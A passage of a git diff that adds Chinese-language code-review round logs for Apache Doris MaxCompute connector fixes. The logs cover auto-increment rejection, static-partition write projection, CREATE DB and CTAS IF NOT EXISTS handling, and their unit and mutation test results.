1 两 reviewer 均 CLEAN,无 finding → **FIX-READ-SPLIT 收敛(1 轮),可 commit**。 +跨轮无矛盾(单轮)。 + +**登记(非本 issue,供后续跟踪)**: PluginDrivenScanNode 未 override `isBatchMode()`(legacy MaxComputeScanNode 对分区表 return true)→ plugin 路径不走 batch/lazy split 生成。独立于 FIX-READ-SPLIT,属另一(性能向)差异,与 READ-P3 分区裁剪丢失同族,**本批外**。 diff --git a/plan-doc/reviews/P4-T06d-FIX-WRITE-ROWS-review-rounds.md b/plan-doc/reviews/P4-T06d-FIX-WRITE-ROWS-review-rounds.md new file mode 100644 index 00000000000000..36be06607d5a8d --- /dev/null +++ b/plan-doc/reviews/P4-T06d-FIX-WRITE-ROWS-review-rounds.md @@ -0,0 +1,23 @@ +# P4-T06d · FIX-WRITE-ROWS — 对抗 review 轮次记录 + +> issue 6 / 6(最后一个)。设计: `plan-doc/tasks/designs/P4-T06d-FIX-WRITE-ROWS-design.md`。 +> 流程: clean-room 多 agent 对抗(Phase A 3 lens 仅读代码 → Phase B 3 票 refute-by-default → Phase C 交叉核对)。 +> 改动: `PluginDrivenInsertExecutor.java` doBeforeCommit 加一行事务模型 `loadedRows` 回填 + `PluginDrivenInsertExecutorTest` 2 新用例。 + +## Round 1 — verdict: `sound`(1 轮收敛,无 real gap) + +review 配置: 3 lens(correctness-parity / regression / test-quality)→ 每 finding 3 skeptic refute-by-default(≥2 confirm 存活)。workflow `wi7zu5h45`,15 agent。 + +4 条 raw findings 经 Phase B **全未存活**(confirms 0/0/0/1,无一 ≥2)→ 无 survivor → verdict `sound`: +- **F1**(confirms 0): 回填测试直接 stub `getUpdateCnt()`,未跑 BE-feedback→commitDataList→getUpdateCnt 链。证伪——单测边界正确(BE 累加链是 connector/BE 侧,fe-core 单测不该跨层)。 +- **F2**(confirms 0): handle 模型用例断言 loadedRows 停 0 无法区分"connectorTx 分支跳过"vs"execImpl 没跑"。证伪——用例直调 doBeforeCommit、显式注 connectorTx=null + finishInsert 被调断言,区分明确。 +- **F3**(confirms 0): `getUpdateCnt()` 依赖 SPI default 返 0,未来事务模型 connector 忘 override 会静默报 0 行。证伪——对 MC 今正确;未来 adopter 是其自身 override 责任,非本 fix 缺陷(投机)。 +- **F4**(confirms 1,未达 2): 测试验 `loadedRows` 字段但未验其流到 reported affected-rows 表面。未存活——affected-rows 表面化是 `BaseExternalTableInsertExecutor` 既有 wiring(非本 fix),由 e2e 覆盖;字段赋值是本 fix 的唯一改动点,已 mutation 锁。 + +## 收敛结论 +1 轮 `sound`。production code 正确(parity / 互斥分支 / 取值时点 / jdbc-es-trino 零影响 三 lens 一致 clean)。 +守门(clean source,cache 关):UT 6/6 绿(4 既有 + 2 新);Checkstyle 0;BUILD SUCCESS。 +mutation 总账: +- `loadedRows = connectorTx.getUpdateCnt()` → `loadedRows = 0L` → `...BackfillsLoadedRows...` 红(expected 42 was 0)。 +- 删 `if (connectorTx != null)` 守卫 → `...SkipsTxnBackfillWhenNoConnectorTxn` 红(NPE: connectorTx null)。 +证回填取值 + 守卫互斥 均 load-bearing。 diff --git a/plan-doc/reviews/P4-T06e-FIX-AUTOINC-REJECT-review-rounds.md b/plan-doc/reviews/P4-T06e-FIX-AUTOINC-REJECT-review-rounds.md new file mode 100644 index 00000000000000..acfb8b8d6cf1c8 --- /dev/null +++ b/plan-doc/reviews/P4-T06e-FIX-AUTOINC-REJECT-review-rounds.md @@ -0,0 +1,37 @@ +# P4-T06e · FIX-AUTOINC-REJECT — review 轮次记录 + +> issue=`P2-8 FIX-AUTOINC-REJECT`(DG-5 / F24, minor, regression) +> design=`plan-doc/tasks/designs/P4-T06e-FIX-AUTOINC-REJECT-design.md` +> 用户定方向:**加 SPI 字段 `ConnectorColumn.isAutoInc`**(full parity),非 deviation。 + +## 设计对抗验证(design workflow `weepgfhwu`) + +verdict = **approve-with-nits**(0 mustFix,parityCorrect=true,blastRadiusComplete=true,testRule9=true,openQuestions=[])。 + +## 实现 + +**改 3 生产 + 3 测试文件**(additive,无 SPI 方法签名变更): +1. SPI `ConnectorColumn.java`:加 `private final boolean isAutoInc`;新 7 参 ctor(唯一全赋值);6 参 ctor 改委托 7 参 `isAutoInc=false`;5 参不变(→6→7);getter `isAutoInc()`;equals/hashCode 纳入 isAutoInc。 +2. fe-core `CreateTableInfoToConnectorRequestConverter.convertColumns`:传 `d.getAutoIncInitValue() != -1` 作第 7 参(auto-inc 判别同 `toSql:225`)。 +3. 连接器 `MaxComputeConnectorMetadata.validateColumns`:循环首加 `if (col.isAutoInc()) throw DorisConnectorException("Auto-increment columns are not supported for MaxCompute tables: " + name)`(镜像 legacy `:422-425`);方法 private→package-private(+test-only 注释,因 createTable 入口需 live ODPS handle,连接器测模块无 mockito/fe-core,按 `MaxComputeBuildTableDescriptorTest` 离线 idiom 直调)。聚合列半(legacy `:426-429`)out-of-scope(F31,非-OLAP key 路径已覆盖),不加。 + +**守门**:**全连接器 compile**(es/hive/hms/hudi/iceberg/jdbc/maxcompute/paimon/trino + fe-core)BUILD SUCCESS——12 个 `new ConnectorColumn(` call site 全编译(additive default false,唯 converter 置 true);UT ConnectorColumnTest 2/2 + MaxComputeValidateColumnsTest 2/2 + ConverterTest 9/9(7+2);checkstyle 0×3;import-gate 净;mutation 三向红:(A) 删连接器 auto-inc throw→`autoIncColumnIsRejected` 红;(B) converter 回退 6 参→`autoIncInitValueIsPropagated` 红;(C) equals 去 isAutoInc→`equalsAndHashCodeDistinguishAutoInc` 红。 +(操作注:mutation 还原一度因 `cd .../fe` 持久 + 相对路径 cp 失败未还原 ConnectorColumn,绝对路径强制还原后 final green 复验 2/2+2/2+9/9——见 auto-memory `doris-build-verify-gotchas`。) + +## Round 1(impl 对抗 review,workflow `wj0pwt0u7`,4 lens) + +6 finding 全 **nit**(0 mustFix/0 shouldConsider): +- nit:converter 测 mock 掉 ColumnDefinition(蓄意——auto-inc ctor 牵 ColumnNullableType;mutation B 证非真空)。 +- nit:converter 测漏 `autoIncInitValue==0` 边界(`0 != -1` 平凡成立,marginal)。 +- nit×2:hashCode 不等断言"stricter-than-contract"(对固定输入确定性——Objects.hash 含翻转布尔必不同;reviewer 注"works in practice")。 +- nit:无测钉 auto-inc 检查 vs 重名检查的顺序(皆抛,仅"既 auto-inc 又重名"edge 才有别)。 +- nit:读路径 `ConnectorColumnConverter.toConnectorColumn` 不带 isAutoInc(**正确**——MC 读表本不可能 auto-inc,false 即对;"in-scope OK"非缺陷)。 + +**收敛**:0 mustFix;6 nit 皆接受(测试已由 3 mutation 钉 3 属性,非真空)。 + +## 累计结论 + +- **根因**(DG-5/F24):legacy `validateColumns:422-425` 显式拒 auto-inc;翻闸后 `ConnectorColumn` 无 isAutoInc 载体 → flag 在到连接器前被丢 → `CREATE TABLE (id INT AUTO_INCREMENT)` 静默建普通列(数据模型回归)。enabling 条件:nereids `ColumnDefinition.validate(isOlap=false)` 不拒 bare auto-inc(仅 generated 列拒,`:666-667`),故 `P4-maxcompute-migration.md:117` 的"nereids 已拒"对 auto-inc 为假。 +- **修**:additive `ConnectorColumn.isAutoInc`(7 参 ctor,默认 false→12 call site 零行为变更,唯 converter 置 true)+ converter 透传 `getAutoIncInitValue() != -1` + 连接器 validateColumns 拒(镜像 legacy 文案)。 +- **真值闸**:UT 充分(纯 FE 校验,throw 在任何 ODPS RPC 前,无需 live ODPS)+ mutation 三向红 + 全连接器 compile。 +- **doc-sync 随后续**:更正 `P4-maxcompute-migration.md:117` 假声明(nereids 未拒 auto-inc)、decisions-log 登记 ConnectorColumn.isAutoInc 字段、DG-5 状态。 diff --git a/plan-doc/reviews/P4-T06e-FIX-BIND-STATIC-PARTITION-review-rounds.md b/plan-doc/reviews/P4-T06e-FIX-BIND-STATIC-PARTITION-review-rounds.md new file mode 100644 index 00000000000000..cb98d235082769 --- /dev/null +++ b/plan-doc/reviews/P4-T06e-FIX-BIND-STATIC-PARTITION-review-rounds.md @@ -0,0 +1,78 @@ +# P4-T06e — FIX-BIND-STATIC-PARTITION (P0-3) — Review Rounds + +> 每轮记录 finding + verdict + 处置,防跨轮矛盾。clean-room 对抗 review(多 agent + code-first 独立判断)。 +> 设计:`plan-doc/tasks/designs/P4-T06e-FIX-BIND-STATIC-PARTITION-design.md` + +--- + +## Round 1 — workflow `wi3mnjymb`(5 lens × review→adversarial-verify,18 agents) + +**裁决**:13 raw → 8 confirmed(3 major / 4 minor / 1 nit)/ 5 refuted;**mustFix=3(同一根因)**。 + +### 🔴 MAJOR(confirmed,同一根因)— P03-1 / P03-LENS-01 / P03-REG-1 + +- **根因**:projection 分支键用了 `!staticPartitionColNames.isEmpty()`(仅静态分区走 full-schema 投影)。但 `getRequirePhysicalProperties` 已改为 **full-schema 索引**——要求 child 始终 full-schema 序。**纯动态/无静态分区**的写(如 `INSERT INTO mc (part, data) SELECT ...` 重排显式列名)走 ELSE 分支(cols 序投影),child=cols 序 ≠ full-schema 序 → 分布按 full-schema 位置索引到**错列**(OOB/错 hash-sort)→ MaxCompute streaming "writer has been closed"。另:分区表显式**部分列**无静态分区写仍走 JDBC 子集投影,偏离 legacy full-schema(P03-REG-1)。 +- **处置 ✅ FIXED**:分支键改为 `!table.getPartitionColumns().isEmpty()`(**分区表** → full-schema 投影,镜像 legacy `bindMaxComputeTableSink`;非分区表 JDBC/ES → 维持 cols 序投影)。这样分区连接器表 child 恒为 full-schema 序,与 full-schema 索引一致;全 case(all-static/partial-static/纯动态含重排/部分列)与 legacy 一致。`BindSink.java:941` + `PhysicalConnectorTableSink` javadoc 更新。 + - **验证**:新增 `dynamicReorderedColumnListHashesByPartitionAtFullSchemaPosition`(cols=[part,data] 重排、child=full-schema [data,part])断言 hash key=partSlot@full-schema 位 1;mutation `getFullSchema()→cols` 令该 test + `partialStaticPartitionHashesByDynamicColumn` 双红(2 failures)。51 测试全绿、checkstyle 0、import-gate 净。 + +### 🟡 MINOR/NIT(confirmed,test gap) + +- **P03-LENS-02**(minor):缺纯动态「重排列名」分布 test(旧 dynamic test cols==fullSchema 退化、不能判 cols-vs-fullschema)。**✅ FIXED**:新增上述 reordered test。 +- **P03-BE-2 / TA-1 / TA-3 / TA-2**(minor×3 + nit×1,同主题):bind 期 full-schema 投影(NULL 填充 + 分区列在 full-schema 末尾)未被 connector-path 单测直接 pin——`BindConnectorSinkStaticPartitionTest` 只测列选择 helper `selectConnectorSinkBindColumns`,未驱动 `bindConnectorTableSink` 的投影。**处置 = 登记已知限制(KNOWN-LIMITATION,非静默)**: + - fe-core **无**驱动 `bindConnectorTableSink` 的轻量 harness(`bind()` 走 `RelationUtil.getDbAndTable` 真 Env 解析;分析-INSERT 测试只覆盖经 `createTable` 注册的 OLAP 内表,PluginDriven 外表需连接器插件,注册成本高、无现成 harness)。 + - 投影由 **共享** helper `getColumnToOutput` + `getOutputProjectByCoercion(table.getFullSchema())` 完成——与 legacy `bindMaxComputeTableSink:904-906` 及 Iceberg 连接器路径**逐字一致**,且这两 helper 被既有 OLAP/Hive/Iceberg insert 分析测试充分覆盖。本 diff 的**新**行为仅是「分区表路由到该共享投影」(一行条件),已被 inspection + 分布层 full-schema 索引测试(要求 child 为 full-schema 序方能过)间接约束。 + - 列**顺序**(数据列…分区列在末尾)由 `getFullSchema()` 的契约决定(连接器 `initSchema` 末尾追加分区列,`MaxComputeConnectorMetadata` 同 legacy),非本 diff 代码决定。 + - 端到端由 p2 live 回归 `regression-test/suites/external_table_p2/maxcompute/write/test_mc_write_static_partitions.groovy` 覆盖(all-static/partial-static/纯动态/VALUES/OVERWRITE)。 + - **结论**:production code 经审阅者确认正确("byte-for-byte same pattern as legacy/Iceberg"),此为单测覆盖缺口非行为缺陷;登记 deviations-log,留待外表分析 harness 落地后补(与 fe-core test-infra 限制耦合)。**真值闸仍是 live e2e。** + +### ✅ REFUTED(5,无需处置) + +- **P03-BE-1 / P03-2 / P03-REG-2**(partial-static BE 末尾擦全部分区列 → 单静态 spec 路由、丢动态列值):审阅者证为 **legacy 既有行为**(本 diff 不改 BE、不引入),parity 保持;属既有 MaxCompute partial-static BE 限制,另案。本 fix 仅泛化 FE 使其与 legacy 一致。 +- **TA-4**:dynamic test 退化——已被 P03-LENS-02 新 test 覆盖。 +- **TA-5**:非空分区列 NULL-fill 安全仅靠连接器硬编码 `nullable=true`——可接受(legacy 同此假设;通用路径无非空分区列)。 + +### Round-1 累计结论 +- 分支键 `!staticPartitionColNames.isEmpty()` → `!table.getPartitionColumns().isEmpty()`(**分区表恒 full-schema 投影 = legacy 忠实镜像**)是本轮关键修正。 +- full-schema 分布索引 + full-schema child 投影**必须成对**——二者只对分区表成立;非分区(JDBC/ES) 维持 cols 序 + capability 门 GATHER。 +- bind 投影单测缺口登记为 KNOWN-LIMITATION(parity + p2 live 覆盖),非静默跳过。 + +--- + +## Round 2 — workflow `wy299gtsh`(4 lens 聚焦 branch-on-partitioned 收敛,6 agents) + +**裁决**:2 raw → **1 confirmed NEW major(mustFix)** / 1 refuted("No change required",被证为正确行为)。 + +### 🔴 MAJOR(confirmed NEW)— P03-R2-01:branch-on-partitioned 仍太窄 → 非分区 MaxCompute 重排/部分显式列名静默丢/错列 + +- **根因**:翻闸后**真实** MaxCompute catalog 是 `PluginDrivenExternalCatalog`(`CatalogFactory:105-113`),**所有** MC 写走 `bindConnectorTableSink`。**非分区** MC 表 `getPartitionColumns()` 空 → 落 cols 序 ELSE 分支。但 MC BE/JNI writer **按位置**映射 Arrow 列到 `writeSession.requiredSchema()`(完整表 schema 序,`MaxComputeJniWriter:202-208,354-356`)。故 `INSERT INTO mc_nonpart (b,a) SELECT ...`(重排)→ 值落错列(静默 corruption);`(a) SELECT ...`(部分)→ 列数不符/未填 NULL。**legacy `bindMaxComputeTableSink:905-908` 无条件 full-schema 投影**(不论是否分区)——branch-on-partitioned 漏了非分区 MC,属翻闸回归。 +- **处置 ✅ FIXED(用户既批"全 parity"方向,采审阅者 option b = capability)**:新增 SPI capability **`SINK_REQUIRE_FULL_SCHEMA_ORDER`**(连接器写按位置映射 full-schema vs JDBC 按名);`MaxComputeDorisConnector.getCapabilities()` 声明之;`PluginDrivenExternalTable.requiresFullSchemaWriteOrder()` 读之;`bindConnectorTableSink` 分支键 `!getPartitionColumns().isEmpty()` → **`table.requiresFullSchemaWriteOrder()`**。这样 **MaxCompute 全写形(分区/非分区 × 全/重排/部分/静态/动态)恒 full-schema 投影 = legacy 逐字等价**;JDBC/ES 不声明 → 维持 cols 序(其 INSERT SQL 按名需 cols 序)。改 4 文件(SPI enum / MC 连接器 / fe-core reader / fe-core bind)+ javadoc。 + - **验证**:3 模块编译绿、checkstyle 0×3、import-gate 净、55 测试全绿。e2e gate:`test_mc_write_insert.groovy` Test 3(部分列)本就 gate 部分列 NULL 填充;**新增 Test 3b(重排显式列名 VALUES+SELECT 两形)** + `.out`——按位置投影正确则 id/name/score 各归位,cols 序投影则错列(live ODPS gate,CI 跳)。 +- **distribution 一致性**:full-schema 索引 + full-schema child 对 MaxCompute 恒成立(capability→full-schema 投影);JDBC 不声明 capability 且无分区列 → 分布走 GATHER(不索引 child)。两 capability 正交:`SINK_REQUIRE_FULL_SCHEMA_ORDER`(投影) vs `SINK_REQUIRE_PARTITION_LOCAL_SORT`(分布)。 + +### ✅ REFUTED(1) + +- **P03-V2-N1**(分区表部分列名校验非空数据列 → 抛 "Column has no default value"):审阅者证为**正确意图行为**(与 legacy MC parity,且翻闸前通用路径反而漏校验 = 更宽松 bug)。无需改。 + +### Round-2 累计结论 +- **正确判别键 = capability `SINK_REQUIRE_FULL_SCHEMA_ORDER`(连接器是否按位置写 full-schema),非"分区"也非"静态分区"。** 三次迭代收敛:static → partitioned → **capability(positional-write)**。最终 = MaxCompute 与 legacy `bindMaxComputeTableSink` 全写形逐字等价。 +- bind 投影单测仍 KNOWN-LIMITATION(无 harness);非分区重排回归经 p2 `test_mc_write_insert.groovy` Test 3/3b live gate + parity 覆盖。capability 声明/reader 按既有约定不单测(既有 readers 亦仅被 mock)。 + +--- + +## Round 3 — workflow `wlwpw0b2s`(3 lens 聚焦 capability 修正收敛 + legacy 全 parity,6 agents) + +**裁决**:3 raw → **mustFix=0(收敛)**;1 confirmed NEW = **nit**(前瞻 robustness,非现行缺陷)/ 2 refuted(同一 nit 的重复/被证非现行缺陷)。 + +### ✅ 收敛确认(legacy 全 parity) +- 三 lens 均确认:capability `SINK_REQUIRE_FULL_SCHEMA_ORDER` gated full-schema 投影令 **MaxCompute 全写形与 legacy `bindMaxComputeTableSink` 逐字等价**(no-list/full/reordered/partial/all-static/partial-static/pure-dynamic/non-partitioned);JDBC/ES 不声明 → cols 序(其 INSERT SQL 按名需之,正确);trino-connector `getCapabilities` 默认空集、不声明 → cols 序(若未来其按位置写须声明该 capability,机制已就位)。common 非分区全序 `INSERT...SELECT` 经 `getColumnToOutput` 全列已 mentioned→无填充、与旧 cols 序投影等价(无 common-case 回归)。 + +### 🟢 NIT(confirmed NEW)— P03-V3-1:跨 capability 隐式耦合(前瞻 robustness) +- **观察**:分布 full-schema 索引 gated on `SINK_REQUIRE_PARTITION_LOCAL_SORT`,而其依赖的 full-schema child 投影 gated on **另一** capability `SINK_REQUIRE_FULL_SCHEMA_ORDER`,二者无耦合校验。**现不可达**(唯一走此路径的 MaxCompute 两 capability 齐声明;Jdbc 皆不声明)。审阅者自评 "NOT a current correctness bug … latent fragility",定级 nit。 +- **处置 ✅**:在 `SINK_REQUIRE_PARTITION_LOCAL_SORT` javadoc 补硬依赖说明("declaring this 须同时声明 `SINK_REQUIRE_FULL_SCHEMA_ORDER`,否则分布按 full-schema 位索引会错列"),与既有 "也须声明 `SUPPORTS_PARALLEL_WRITE`" 约定同款。不加运行期 assert(对假想未来连接器属过度设计;doc fail-loud 足够)。 + +### Round-3 累计结论 +- **mustFix=0,收敛**。三轮迭代:static → partitioned → **capability(positional-write)**,终态 = MaxCompute 与 legacy `bindMaxComputeTableSink` 全写形逐字 parity;JDBC/ES cols 序 parity。 +- 两写 capability 正交但有硬依赖(LOCAL_SORT ⟹ FULL_SCHEMA_ORDER),已 javadoc 登记。 +- 真值闸仍为 live e2e(p2 `test_mc_write_insert` Test 3/3b + `test_mc_write_static_partitions`)。bind 投影单测缺口 = KNOWN-LIMITATION(无外表分析 harness),parity + p2 覆盖。 + +## ✅ 最终裁决:3 轮收敛(0 mustFix),可 commit。 diff --git a/plan-doc/reviews/P4-T06e-FIX-CREATE-DB-PRECHECK-review-rounds.md b/plan-doc/reviews/P4-T06e-FIX-CREATE-DB-PRECHECK-review-rounds.md new file mode 100644 index 00000000000000..ecf787d1cba08d --- /dev/null +++ b/plan-doc/reviews/P4-T06e-FIX-CREATE-DB-PRECHECK-review-rounds.md @@ -0,0 +1,39 @@ +# P4-T06e · FIX-CREATE-DB-PRECHECK — review 轮次记录 + +> issue=`P2-6 FIX-CREATE-DB-PRECHECK`(DG-4 / F26 / F23, major, regression) +> design=`plan-doc/tasks/designs/P4-T06e-FIX-CREATE-DB-PRECHECK-design.md`(含 §决策更新-实现) +> 用户定方向(OQ-1):**能力门闸** = 加 additive `supportsCreateDatabase()`,远端预检 gate 在其上,使 jdbc/es/trino 字节不变(非原推荐"接受+登记 deviation")。 + +## 设计对抗验证(design workflow `weepgfhwu`) + +verdict = **approve-with-nits**(0 mustFix,parityCorrect=true,blastRadiusComplete=true)。关键产出:**OQ-1**(jdbc/es/trino 同走 `createDb` override、有真 `databaseExists` 但不支持 `createDatabase`,预检会令其 `CREATE DB IF NOT EXISTS <远端已存在库>` 从"not supported"变静默 no-op)——已升给用户拍板 → 选**能力门闸**。另:doc-citation nit(行号小偏)、micro-cleanup nit(double getMetadata)。 + +## 实现(能力门闸) + +**改 5 文件**: +1. SPI `ConnectorSchemaOps.java`:加 additive `default boolean supportsCreateDatabase(){return false;}`(零破坏其余 6 连接器)。 +2. 连接器 `MaxComputeConnectorMetadata.java`:override `supportsCreateDatabase()→true`。 +3. fe-core `PluginDrivenExternalCatalog.createDb`:hoist `ConnectorMetadata metadata` 局部(消 double getMetadata,addr micro-cleanup nit);gated 远端预检 `if (ifNotExists && metadata.supportsCreateDatabase() && metadata.databaseExists(session,dbName)) return;`(`&&` 短路:能力位 false 时连远端都不查)+ 保留 FE-cache 快路径 + Javadoc 更正。镜像 legacy `createDbImpl:110-124`(查 FE-cache+远端、IFNE 已存在 no-op)。 +4. 测试 `PluginDrivenExternalCatalogDdlRoutingTest.java`:+3 测(remote-exists+supports→no-op / remote-absent→建库 / lacks-support→bypass 落 createDatabase 且不查 databaseExists)。 +5. 新测 `MaxComputeConnectorMetadataCapabilityTest.java`:钉 MaxCompute `supportsCreateDatabase()==true`(fe-core 测用 mock 故不覆盖真 override,此为唯一钉点)。 + +**非-IFNE+远端已存在错误文案**:保持现状(连接器/ODPS 抛 DdlException),不补 FE 侧 `ERR_DB_CREATE_EXISTS`——两者皆 fail-loud,仅文案/errno 差,pre-existing 且 out-of-scope(Rule 2/3,登记 deviation)。 + +**守门**:编译 api+maxcompute+fe-core 绿;UT RoutingTest 22/22 + CapabilityTest 1/1 + DropDbTest 4/4;checkstyle 0×3;import-gate 净;mutation 三向红:(a) 删预检行→测 1&2 红、测 3 绿;(b) 去 `supportsCreateDatabase() &&` gate→测 3 红(`never().databaseExists` 违反);(c) 连接器 capability true→false→CapabilityTest 红。 + +## Round 1(impl 对抗 review,workflow `wsrg9cwne`,4 lens) + +5 finding 全 **nit**(0 mustFix/0 shouldConsider): +- ✅(正面)"Cross-connector byte-identical claim VERIFIED — jdbc/es/trino 无行为变化"——关键风险经独立核码确认 clean。 +- nit:非-IFNE+远端已存在 错误文案/SQLSTATE 异于 legacy(×2 lens 命中,pre-existing+out-of-scope,已记)。 +- nit:无测显式钉 `&&` 求值序 BEFORE databaseExists(仅由 unsupported-connector case 推断)——测 3 `never().databaseExists` 实已推断性钉住,borderline,不改。 +- nit(**已修**):测 3 WHY 注释 + 设计 doc 误述 gate-removal mutation 的红因机制(实测 mutB 红在 `never().databaseExists` 断言、非 createDatabase)。**处置**:更正测 3 注释 + 设计 doc Test Plan MUTATION (b) 为准确机制(comment-only,无行为变更)。 + +**收敛**:0 mustFix。唯一可操作 nit(注释精度)已修。 + +## 累计结论 + +- **根因**(DG-4):`createDb:314` 仅查 FE-cache,FE-cache miss+远端已存在时 `CREATE DB IF NOT EXISTS` 穿透到 ODPS `schemas().create()` 抛 "already exists",违 IFNE 语义(legacy `createDbImpl` 同查 FE-cache+远端 `databaseExist`)。 +- **修**:additive SPI `supportsCreateDatabase()`(default false)+ MaxCompute override true + fe-core gated 远端预检。**jdbc/es/trino 字节不变**(能力位 false → `&&` 短路,仍走 createDatabase 抛 "not supported",连远端都不查)——R6 行为变化经能力门闸消除,无需 deviation。 +- **真值闸**:UT 全绿 + mutation 三向红。live e2e(远端预建 schema、本 FE cache miss、CREATE DB IF NOT EXISTS 应静默成功)CI 跳。 +- **doc-sync(随后续)**:DDL-C4 重开登记、task-list「6/6 完成」措辞更正、deviations-log 登记非-IFNE 文案偏差 + 能力门闸决策。 diff --git a/plan-doc/reviews/P4-T06e-FIX-CTAS-IF-NOT-EXISTS-review-rounds.md b/plan-doc/reviews/P4-T06e-FIX-CTAS-IF-NOT-EXISTS-review-rounds.md new file mode 100644 index 00000000000000..ed94839a54a6ca --- /dev/null +++ b/plan-doc/reviews/P4-T06e-FIX-CTAS-IF-NOT-EXISTS-review-rounds.md @@ -0,0 +1,38 @@ +# P4-T06e · FIX-CTAS-IF-NOT-EXISTS — review 轮次记录 + +> issue=`P2-7 FIX-CTAS-IF-NOT-EXISTS`(DG-6 / F33, minor→**major**, regression) +> design=`plan-doc/tasks/designs/P4-T06e-FIX-CTAS-IF-NOT-EXISTS-design.md` +> 方向:FE-only,无 SPI 变更。`createTable` 区分新建 vs 已存在,IFNE 命中返回 true 短路 CTAS。 + +## 设计对抗验证(design workflow `weepgfhwu`) + +verdict = **approve-with-nits**(0 mustFix,parityCorrect=true,blastRadiusComplete=true,**testPlanRule9Compliant=false**)。test-quality 旗标:① 设计原 Test 1 的 `resetMetaCacheNames` 断言真空(生产经 `getDbForReplay(...).resetMetaCacheNames()` 在 replay-db 对象上 reset,非 `catalog.resetMetaCacheNames()`);② 缺 `exists && !isIfNotExists()` 测。**两者实现时已纳入**(见下)。 + +## 实现 + +**改 1 生产文件 + 1 测试文件**(无 SPI、无签名变更): +- `PluginDrivenExternalCatalog.createTable`:hoist `ConnectorMetadata metadata` 局部;加存在性预检 `boolean exists = metadata.getTableHandle(session, db.getRemoteName(), tableName).isPresent() || db.getTableNullable(tableName) != null;`(镜像 legacy `createTableImpl:178-197` 双探);`if (exists && isIfNotExists()) return true;`(跳连接器 create + editlog + resetMetaCacheNames);否则原逻辑不变(return false)。Javadoc 更正(删"conservatively assumes creation"陈述)。 +- `PluginDrivenExternalCatalogDdlRoutingTest` +3 测:① IFNE+远端已存在→true+跳全副作用(`verify(replayDb, never()).resetMetaCacheNames()` 非真空断言);② IFNE+本地 cache 已存在(远端空、local arm)→true;③ 已存在+非-IFNE→连接器抛→DdlException 传播+createTable 被调(钉"非-IFNE 不误短路")。 + +**契约确认**:`Env.createTable:3749-3752` 直接回传 override 返回值 → `CreateTableCommand:103 if(createTable(...))return;` CTAS 短路。返回 true 即阻止 INSERT 入已存在表(DG-6 数据变更 bug)。 + +**守门**:编译 fe-core 绿;UT RoutingTest 25/25;checkstyle 0;mutation 三向红:(A') `return true`→`false`→测 1&2 红;(B) 去 `&& isIfNotExists()`→测 3 红;(C) 去 `|| db.getTableNullable(...) != null`→**仅**测 2 红(钉 local arm)。(注:checkstyle 绑 validate 阶段随 build 跑——删整块致 `exists` unused 会先 checkstyle 红,故用 `return true→false` 作 mutA'。) + +## Round 1(impl 对抗 review,workflow `wh4ja0geq`,4 lens) + +2 candidate(同一问题)入 verify,**均证伪(isReal=false)**,0 mustFix: +- **REFUTED(已记 known pre-existing gap)**:`已存在+非-IFNE` 且**仅本地 cache 命中(远端缺)**时——legacy `createTableImpl:189-195` 抛 `ERR_TABLE_EXISTS_ERROR`,cutover(P2-7 前后皆然)静默远端建表(连接器 `createTable:337` 只探远端、远端缺→不抛→建表)。证伪理由:**非 P2-7 引入**——HEAD(P2-7 前)该 override 无任何 FE 侧存在预检,非-IFNE 直落 `connector.createTable`,此子case 字节一致;P2-7 的预检**只** gate IFNE 短路。P2-7 范围=DG-6(IFNE-CTAS 静默 INSERT 数据变更)已修。设计 §157-175 明确将非-IFNE 错误码/文案分歧记为 pre-existing out-of-scope。且远端确缺时建表(FE-cache 陈旧)outcome 可争议地比 legacy 抛错更对。 +- 其余 lens(parity / blast-roundtrip / test-quality)finding 全 nit(含正面确认:override 仅 plugin catalog 可达、getTableHandle 为既有 SPI default、new-table 路径既有测覆盖)。 + +**收敛**:0 mustFix。 + +## ⚠️ KNOWN PRE-EXISTING GAP(非本 fix 引入、out-of-scope、待用户定) + +`CREATE TABLE `(**无 IF NOT EXISTS**)当 `` 在 FE cache 存在但远端 ODPS 已不存在(cache 陈旧 / drop-out-of-band)时:legacy 抛 `ERR_TABLE_EXISTS_ERROR`(基于 local cache),cutover 静默在远端建表。**P2-7 未改变此子case**(pre-existing on cutover)。严重度可争议(远端确缺,建表 outcome 未必错)。若要全 legacy parity + fail-loud,可在 `exists && !isIfNotExists()` 加 FE 侧 `ErrorReport.reportDdlException(ERR_TABLE_EXISTS_ERROR, tableName)`——但属 DG-6 之外、且会改远端-hit 路径错误文案。建议留 P3/backlog 由用户定,不在本 fix 扩 scope(Rule 3)。 + +## 累计结论 + +- **根因**(DG-6/F33):override 恒 `return false` + 恒写 editlog → `CreateTableCommand:103` 不短路 → `CREATE TABLE IF NOT EXISTS ... AS SELECT` 对已存在表执行 INSERT(静默数据变更,非仅 editlog 冗余)。 +- **修**:FE 侧存在预检(远端 getTableHandle OR 本地 getTableNullable,镜像 legacy 双探)+ IFNE 命中 return true 跳 create/editlog/cache-reset。无 SPI 变更(复用既有 `getTableHandle` default Optional.empty(),其余连接器零影响——本 override 仅 plugin catalog 可达)。 +- **真值闸**:UT 25/25 + mutation 三向红。live e2e(CREATE TABLE IF NOT EXISTS ... AS SELECT 对已存在表 → 行数不变 / 新表 → 建+填)CI 跳。 +- **doc-sync 随后续**:DDL-C5 从 minor 上调 major、cutover-fix-design CTAS 语义更正、上方 KNOWN GAP 入 deviations-log(待用户定)。 diff --git a/plan-doc/reviews/P4-T06e-FIX-DROP-DB-FORCE-review-rounds.md b/plan-doc/reviews/P4-T06e-FIX-DROP-DB-FORCE-review-rounds.md new file mode 100644 index 00000000000000..0bdf8e3a06c23a --- /dev/null +++ b/plan-doc/reviews/P4-T06e-FIX-DROP-DB-FORCE-review-rounds.md @@ -0,0 +1,42 @@ +# P4-T06e · FIX-DROP-DB-FORCE — review 轮次记录 + +> issue=`P2-5 FIX-DROP-DB-FORCE`(DG-3 / F22 / F27, major, regression) +> design=`plan-doc/tasks/designs/P4-T06e-FIX-DROP-DB-FORCE-design.md` +> 流程:设计(含对抗验证)→ 改 → 编译+UT+checkstyle+import-gate+mutation → 对抗 review → 收敛 → commit。 +> 用户定方向:**扩 SPI `dropDatabase` 带 force**(cascade 下推连接器),非 FE 侧级联。 + +## 设计对抗验证(design workflow `weepgfhwu`,2 phase:design→verify) + +verdict = **approve-with-nits**(0 mustFix,parityCorrect=true,blastRadiusComplete=true,testPlanRule9Compliant=true)。 +- nit①(out-of-scope):`PluginDrivenExternalCatalog.dropDb` 仅 catch `DorisConnectorException`;`structureHelper.listTableNames` 可能抛裸 `RuntimeException`(OdpsException 被包成 unchecked)逃逸未包成 DdlException。**pre-existing**——非 force 路径早经 